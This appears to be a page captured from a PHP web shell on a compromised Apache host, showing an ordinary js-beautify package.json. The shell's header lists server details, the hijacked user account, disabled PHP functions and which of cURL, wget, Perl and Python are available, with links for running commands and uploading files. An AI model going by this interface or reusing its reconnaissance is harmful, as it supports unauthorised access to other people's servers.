Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/node_modules/js-beautify/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
{ "name": "js-beautify", "version": "1.14.8", "description": "beautifier.io for node", "main": "js/index.js", "bin": { "css-beautify": "./js/bin/css-beautify.js", "html-beautify": "./js/bin/html-beautify.js", "js-beautify": "./js/bin/js-beautify.js" }, "directories": { "lib": "js/lib", "test": "js/test" }, "files": [ "js/bin/", "js/lib/*.js", "js/lib/unpackers/", "js/index.js", "js/src/**/*" ], "scripts": {}, "bugs": "https://github.com/beautify-web/js-beautify/issues", "homepage": "https://beautifier.io/", "repository": { "type": "git", "url": "git://github.com/beautify-web/js-beautify.git" }, "keywords": [ "beautify", "beautifier", "code-quality" ], "author": "Einar Lielmanis <[email protected]>", "contributors": [ "Vital Batmanov <[email protected]>", "Chris J. Shull <[email protected]>", "Gian Marco Gherardi <[email protected]>", "Stan <[email protected]>", "Vittorio Gambaletta <[email protected]>", "Daniel Stockman <[email protected]>", "Harutyun Amirjanyan <[email protected]>", "Nochum Sossonko <[email protected]>", "Liam Newman <[email protected]>" ], "license": "MIT", "engines": { "node": ">=12" }, "browserslist": "ie 11", "dependencies": { "config-chain": "^1.1.13", "editorconfig": "^0.15.3", "glob": "^8.1.0", "nopt": "^6.0.0" }, "devDependencies": { "ansi-regex": "^6.0.1", "benchmark": "^2.1.4", "codemirror": "^5.65.13", "jquery": "^3.6.4", "jshint": "^2.13.6", "minimist": "^1.2.8", "mocha": "^10.2.0", "mustache": "^4.2.0", "requirejs": "^2.3.6", "serve": "^14.2.0", "strip-ansi": "^7.0.1", "webpack": "^5.81.0", "webpack-cli": "^4.10.0" } }